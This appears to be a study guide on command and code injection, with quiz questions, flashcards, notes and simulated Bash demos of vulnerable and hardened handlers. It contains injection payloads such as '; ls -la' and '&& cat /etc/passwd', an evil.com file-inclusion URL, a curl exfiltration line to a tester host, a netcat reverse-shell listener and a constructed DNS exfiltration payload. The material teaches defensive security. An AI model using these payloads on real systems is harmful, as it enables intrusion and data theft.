Command and Code Injections


Questions and Answers

Which of the following scenarios describes a circumstance where code/command execution flaws are most likely to arise?

  • When strong password policies are enforced.
  • When data transmission occurs over encrypted channels.
  • When an application interprets or executes unsafe input. (correct)
  • When network segmentation is properly implemented.

In the context of web security, what is the primary characteristic of an 'injection' vulnerability?

  • The practice of regularly updating software to patch known security vulnerabilities.
  • The process of encrypting sensitive data to prevent unauthorized access.
  • The introduction of untrusted data into an interpreter, potentially leading to unintended commands or unauthorized data access. (correct)
  • The technique of monitoring network traffic for malicious activities.

Consider a PHP application using the following code: system("ping " . $_GET['host']); If the application lacks proper input sanitization, which of the following inputs for the host parameter exploits the command injection vulnerability?

  • example.com
  • www.example.com
  • example.com; ls -la (correct)
  • 127.0.0.1

Bash and other system shells interpret certain characters as command separators. Besides the semicolon (;), which of the following is another character that can typically be used to inject commands in a Bash environment?

  • The newline character (\n) (correct)

Within the context of command injection, what is the purpose of 'command substitution'?

  • To substitute a command enclosed in special delimiters with its output. (correct)

In a black-box penetration testing scenario, what initial step is crucial when attempting to identify a command injection vulnerability?

  • Looking at the web application logic to find areas where external programs might be used, and injecting special characters to see if the application behaves unexpectedly. (correct)

When assessing a white-box environment for potential command injection flaws, what specific elements should security professionals prioritize?

  • Functions or statements within the code that execute system commands. (correct)

If an application displays errors, what is a useful thing to inject to identify a command injection?

  • A non-existent command; then inspect the resulting error message. (correct)

What is a "pingback" and how can it be used in the context of identifying command injection vulnerabilities?

  • A back-connection to a host that the tester controls, and a powerful way to verify if there are command injection flaws. (correct)

When attempting to use a pingback to identify command injection flaws, which of the following techniques is most effective for initiating the necessary request to your designated host?

  • Use commonly installed programs like wget, curl, or netcat/telnet. (correct)

In the context of command injection within Bash, what is the significance of the /dev/tcp/* special files?

  • They can be leveraged to open TCP connections using Bash's built-in redirection, without any external program. (correct)

How can DNS queries be useful when validating command injection vulnerabilities, and what is a common approach for leveraging them?

  • DNS queries can validate command injections because they are rarely blocked by firewalls, and the lookups can be observed using DNS bin sites. (correct)

Given a Requestbin domain like *.d955264982a2216dc0c4.d.requestbin.net, how would you typically leverage this within a command injection payload to validate the vulnerability?

  • By replacing the * symbol with a string and issuing a DNS resolution for the resulting name. (correct)

Within the context of command injection, what is meant by the term 'blind' command injection?

  • It refers to a command injection where the application produces no direct output. (correct)

In scenarios involving blind command injection, what is a common technique for exfiltrating the output of the injected command?

  • Writing the output to a file in a directory reachable from the network. (correct)

When dealing with blind command injection on a Linux system, how can an attacker redirect the output of a command to a publicly accessible file?

  • Using the > character to redirect the output to a file in a writable directory. (correct)

When attempting to exfiltrate data via blind command injection, which directories are often writable and publicly reachable, making them prime targets for output redirection?

  • /static/ and /js/ (correct)

Regarding out-of-band connections for blind command injection, which of the following techniques is a viable method?

  • Sending the output of a command in a TCP/HTTP request to a host the tester controls. (correct)

What is a potential command-line instruction to start listening for incoming connections on port 1337, ready to receive a reverse shell?

  • nc -lvp 1337 (correct)

What is the primary difference between command injection and code injection vulnerabilities?

  • Command injection exploits the operating system shell; code injection leverages the application interpreter. (correct)

In scripting languages, what are the common entry points for code injection vulnerabilities?

  • Functions/language constructs that evaluate code dynamically. (correct)

Why is it important to know the language the application is written in when trying to find code injections?

  • Code injections are language dependent. (correct)

Which special characters are commonly used in many languages to detect code injections?

  • Single and double quotes, and the escape character. (correct)

In PHP, which statement is a frequent source of code injection vulnerabilities?

  • include (correct)

What is local file inclusion (LFI)?

  • A type of injection that allows execution of arbitrary PHP files on the filesystem if user-supplied input is passed directly to the PHP include statement. (correct)

In PHP code injection, what role do the tags <?php ... ?> play?

  • They delimit PHP code, so arbitrary code can be executed if the tags are allowed through unsanitized. (correct)

What is 'file poisoning' in the context of PHP code injection?

  • The act of writing data into a file so that PHP code can be injected. (correct)

What should be the primary focus when creating a payload for file poisoning or file upload attacks?

  • Keep the payload as simple as possible while still allowing arbitrary code execution. (correct)

What broad strategy should be used to prevent most code and command injections?

  • Avoiding user input to system functions. (correct)

If avoiding the use of user input is impossible, what mitigations could you take?

  • Using whitelists when possible and using a proper escaping function. (correct)

In the context of preventing command injection vulnerabilities, what are the key characteristics and limitations of using a 'sandbox'?

  • Sandboxes can often be escaped, and even well-tested ones are not completely secure, but they are still a useful method to limit the impact of command injection. (correct)

An application passes unsanitized user input to a system() call in PHP. The user provides the input example.com && cat /etc/passwd. What is the most likely outcome?

  • The system executes ping example.com and then attempts to execute cat /etc/passwd, potentially disclosing sensitive information. (correct)

An application uses user-supplied data to construct a filename that is then passed to PHP's include() function. An attacker provides the filename http://evil.com/malicious_code.txt. What vulnerability can this lead to, and what is the most significant risk?

  • Remote File Inclusion (RFI), allowing the attacker to execute arbitrary code on the server. (correct)

A web application allows users to upload images. However, it does not properly validate the uploaded files. An attacker uploads a file named evil.php containing PHP code. What is the most likely outcome?

  • The attacker can access evil.php directly through the web server, executing the embedded PHP code. (correct)

A developer uses PHP's escapeshellarg() function to sanitize user input before passing it to a system command. Under what circumstance might this not be sufficient to prevent command injection?

  • When the system command being executed has its own vulnerabilities (for example, it treats the quoted value as a command-line option, or is itself exploitable). (correct)

A security analyst discovers that a system is vulnerable to command injection due to the improper use of the system() function in PHP. Which of the following steps would be MOST effective in remediating this vulnerability?

  • Rewrite the code to avoid using system() and employ PHP functions designed for the specific task. (correct)

You are tasked with hardening a PHP application against code injection attacks. Which of the following practices is MOST important?

  • Escaping user-provided data with language-appropriate functions (e.g., mysqli_real_escape_string for SQL and htmlspecialchars for HTML). (correct)

Flashcards

Command Injection

A flaw where a web application passes unsafe data to a system shell.

Command Separators

Special characters in bash, like ';', that allow multiple commands in one line.

Command Substitutions

A way to inject code by substituting commands with their output.

BlackBox Command Injection Detection

Inspect web application logic and look for external program calls.

WhiteBox Command Injection Detection

Identify functions/statements that execute system commands in the code.

Sleep Command Injection Test

A method to check for command injection by causing a delay.

Pingback for Injection Testing

Technique using back-connections to a controlled host to verify command injection.

DNS Pingback

A type of pingback that is less likely to be blocked by firewalls.

Blind Command Injection

A command injection with no visible output.

Output Redirection for Blind Injection

Redirecting command output to a publicly accessible file.

Out-of-Band Connection

Exfiltrating data using back-connections in blind command injection.

Reverse Shell

A connection initiated from the target to the attacker's machine.

Code Injection

A type of injection where the injected code is executed by the application's interpreter.

Code Injection Entry Points

Functions like eval, evaluate and assert

PHP Injection Points

PHP functions like include

Arbitrary PHP Execution

If user input is passed to include, it can execute arbitrary PHP files.

PHP Code Injection

Injecting PHP code into a remote server via file uploads or file poisoning.

File Poisoning

Exploiting writable files or logs for PHP code execution.

Simple Code Injections

Simple code injections like

Input Sanitization

Avoid user input, validate or use whitelists, use escaping functions

Study Notes

Introduction to Command and Code Injections

  • Code or command execution is a common security vulnerability
  • It occurs when untrusted data gets interpreted or executed by an application
  • This can compromise data confidentiality, integrity, and availability
  • Injection flaws happen when an application needs to use external programs or execute dynamic code

Command Injections

  • Command injection happens when a web application passes unsafe data to a system shell
  • Without input sanitization, attackers can append their own commands to the intended one
  • Special characters interpreted by Bash let an attacker inject commands
  • Command separators include the semicolon (;), the newline character (\n), and the logic operators && and ||
  • Command substitution replaces a command enclosed in special delimiters with its output
  • The two main syntaxes are $(command) and `command` (backticks)
  • To find command injection flaws in a black box, check the application logic for places where external programs are likely used, inject special characters, and watch for unexpected behaviour
  • To find command injection flaws in a white box, look for functions that execute system commands (in PHP: system, exec, shell_exec, passthru, popen, proc_open and the backtick operator)
  • If the application shows errors, inject a non-existent command and look at the error message
  • Test the response time with a sleep command (e.g. ; sleep 5), which works even when no output is returned
  • A pingback is a back-connection from the target to a host the tester controls, used to verify the injection
  • A VPS or an HTTP/TCP tunneling tool (such as ngrok) provides the host that receives the pingback
  • Commonly installed programs such as wget, curl, or netcat/telnet can issue the request
  • In Bash, the special files /dev/tcp/<host>/<port> open TCP connections through built-in redirection, with no external program needed
  • DNS pingbacks (a lookup of a name under a domain the tester controls, e.g. a DNS bin) validate command injections even when outbound TCP is filtered, because DNS is rarely blocked
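
The separators and substitution syntaxes listed above, worked through in Bash as an added example (not code from the original lesson). It simulates the lesson's system("ping " . $_GET['host']) pattern with a harmless echo PING in place of the real ping, so nothing leaves the machine, and shows the same call after the input is quoted the way PHP's escapeshellarg does and, separately, after it is checked against a hostname allowlist and passed as a real argument instead of being spliced into a command string. The function names and payload strings are my own.

```bash
#!/usr/bin/env bash
# Added example: the lesson's system("ping " . $_GET['host']) pattern,
# simulated. 'echo PING' stands in for the real ping. PHP's system()
# hands the string to /bin/sh -c, which is exactly what happens here.

# Vulnerable: user input is concatenated straight into the command line.
vulnerable_ping() {
    local host="$1"
    sh -c "echo PING $host" 2>&1
}

# Equivalent of PHP's escapeshellarg(): wrap the value in single quotes
# and turn every embedded single quote into '\'' so the shell receives
# the whole value as one literal word. ($(...) drops trailing newlines.)
shell_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# Quoted: separators and substitution characters lose their meaning,
# but the attacker still controls what ping receives as its argument.
quoted_ping() {
    local host="$1"
    sh -c "echo PING $(shell_quote "$host")" 2>&1
}

# Hardened: allowlist first (a hostname is letters, digits, dots and
# hyphens, and must not start with '-', so it cannot be read as an
# option), then avoid string building entirely by passing the value
# as a positional argument to the shell.
hardened_ping() {
    local host="$1"
    if ! [[ "$host" =~ ^[A-Za-z0-9][A-Za-z0-9.-]*$ ]]; then
        echo "rejected: invalid host"
        return 1
    fi
    sh -c 'echo PING "$1"' _ "$host" 2>&1
}

# Constructed payloads, one per injection technique from the lesson.
PAYLOADS=(
    'example.com; echo INJECTED'           # semicolon separator
    'example.com && echo INJECTED'         # logic operator
    $'example.com\necho INJECTED'          # newline separator
    'example.com $(echo SUBSTITUTED)'      # $() command substitution
    'example.com `echo SUBSTITUTED`'       # backtick substitution
)

demo() {
    local p
    for p in "${PAYLOADS[@]}"; do
        printf -- '--- payload: %q\n' "$p"
        printf 'vulnerable: %s\n' "$(vulnerable_ping "$p")"
        printf 'quoted:     %s\n' "$(quoted_ping "$p")"
        printf 'hardened:   %s\n' "$(hardened_ping "$p" || true)"
    done
}
demo
```

Run it as-is; every payload produces a second line (INJECTED) or an extra word (SUBSTITUTED) from the vulnerable handler, a single literal line from the quoted one, and a rejection from the hardened one. Quoting alone stops the shell from interpreting the input, but the allowlist is what stops a value such as -c 1000000 from being handed to the program as an option, which is the escapeshellarg limitation the quiz asks about.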

Blind Command Injection

  • A blind command injection produces no output in the application's response
  • Use network-reachable directories or out-of-band connections to exfiltrate the output
  • The character > redirects command output to a file
  • Some directories are commonly writable by the application and publicly reachable over HTTP
  • They include static-file directories, like /static/ and /js/
  • They can also be directories where users upload files
  • Out-of-band methods include a reverse shell, TCP/HTTP requests, or a DNS bin
  • Netcat can receive a reverse shell: nc -lvp 1337 on a publicly reachable host listens on TCP port 1337 for the connection back from the target
  • Command substitution can embed a command's output in an HTTP request, e.g. curl http://<tester-host>/$(whoami), to exfiltrate it
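
The blind-injection workflow above (time-based detection, redirecting output into a web-reachable directory, and a DNS pingback carrying the output) as an added Bash example that is not part of the original lesson. The vulnerable handler is simulated: it runs the injected command the way system() would but discards all output, as the lesson's blind case describes. A temporary directory stands in for the target's web root and its /static/ folder, the Requestbin token is the placeholder from the quiz, and the DNS payload is only constructed, not sent, so everything runs offline.

```bash
#!/usr/bin/env bash
# Added example: blind command injection, simulated.
# blind_ping() runs the concatenated command like system() would but
# swallows stdout and stderr, so the attacker only ever sees "ok".

WEBROOT="$(mktemp -d)"                      # stands in for the web root
mkdir -p "$WEBROOT/static"                  # writable and served, like /static/
trap 'rm -rf "$WEBROOT"' EXIT
REQUESTBIN_TOKEN="d955264982a2216dc0c4"     # placeholder token from the lesson

blind_ping() {
    local host="$1"
    sh -c "echo PING $host" >/dev/null 2>&1
    echo "ok"
}

# 1. Time-based detection: inject a sleep and measure the round trip.
#    Prints the elapsed whole seconds.
time_probe() {
    local payload="$1" start end
    start=$(date +%s)
    blind_ping "$payload" >/dev/null
    end=$(date +%s)
    echo $(( end - start ))
}

# 2. Output redirection: send the command's output to a file under a
#    directory that is both writable and reachable over HTTP, then
#    "fetch" it (here: read it back from disk instead of over HTTP).
exfil_via_webroot() {
    local cmd="$1" name="$2"
    blind_ping "example.com; $cmd > $WEBROOT/static/$name" >/dev/null
    cat "$WEBROOT/static/$name"
}

# 3. DNS pingback carrying data: a DNS label may only contain letters,
#    digits and hyphens and is at most 63 characters, so hex-encode the
#    output and truncate it before using it as the leftmost label.
dns_label() {
    printf '%s' "$1" | od -An -tx1 | tr -d ' \n' | cut -c1-60
}

# Builds the payload that would replace the lesson's "*" with the
# hex-encoded output of $cmd. Returned as a string, not executed,
# because there is no network in this example.
dns_pingback_payload() {
    local cmd="$1"
    printf 'example.com; nslookup $(%s | %s).%s.d.requestbin.net' \
        "$cmd" 'od -An -tx1 | tr -d " \n" | cut -c1-60' "$REQUESTBIN_TOKEN"
}

demo() {
    echo "baseline:        $(time_probe 'example.com')s"
    echo "with sleep 2:    $(time_probe 'example.com; sleep 2')s"
    echo "leaked id:       $(exfil_via_webroot 'id' 'out.txt')"
    echo "label for uid=0: $(dns_label 'uid=0')"
    echo "DNS payload:     $(dns_pingback_payload 'whoami')"
}
demo
```

The timing probe is the cheapest confirmation when nothing comes back, the redirect works only when the application's user can write into a served directory, and the DNS variant is what remains when outbound TCP is filtered; the hex encoding matters because raw id output contains characters that are not valid in a hostname.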

Code Injection

  • Code injection works similarly to command injection
  • The difference is the injected code executes via the application's interpreter
  • Functions/language constructs that evaluate code dynamically are common entry points
  • These functions include eval, evaluate, or assert
  • Code injections are language dependent, and you need to know the application’s language
  • Some special characters include quotes, backticks, dollar signs, and escape characters

PHP Code Injection

  • PHP code injection has injection points other than the eval function
  • A common pitfall is the include statement
  • If user-supplied input is passed to include, an attacker can execute arbitrary PHP files already present on the filesystem
  • This is called "local file inclusion (LFI)"
  • If PHP's allow_url_include setting is enabled, a URL can be included instead, which is remote file inclusion (RFI)
  • PHP code delimited by <?php ... ?> tags can be injected into any file the application later includes
  • The two main approaches are file uploads and file poisoning
  • File poisoning means getting attacker-controlled data written into a file that PHP later includes
  • Application logs are a typical target, because applications often implement their own logging
  • Web server logs, like those of Nginx/Apache, are generally not readable by the PHP process
  • Local database or cache files are another target, when an application stores user information inside a local file
  • To execute PHP code via an upload, get a .php file into a web-served directory on the target
  • This happens when user uploads are saved in a directory where PHP executes, without enforcing the file name or extension

Tips and Tricks

  • Keep payloads simple when dealing with file poisoning or file uploads
  • Prefer a payload that executes arbitrary PHP code over one that runs a single system command
  • System-related functions are commonly disabled or limited (e.g. via PHP's disable_functions), so don't guess: check which ones are available
  • If system commands can be used, use them
  • It is easier to run ls than to write a custom PHP function for directory listing

Fixes

  • To fix code and command injections, avoid passing user input to system functions
  • Avoid generating dynamic code from user input
  • Validate user input against whitelists
  • Use escaping functions such as PHP's escapeshellarg (it quotes one argument; pass each value as its own argument and reject values starting with -, which the program may read as options)
  • Sandboxes offer a limited execution environment, but they can often be escaped; treat them as an extra layer, not the fix
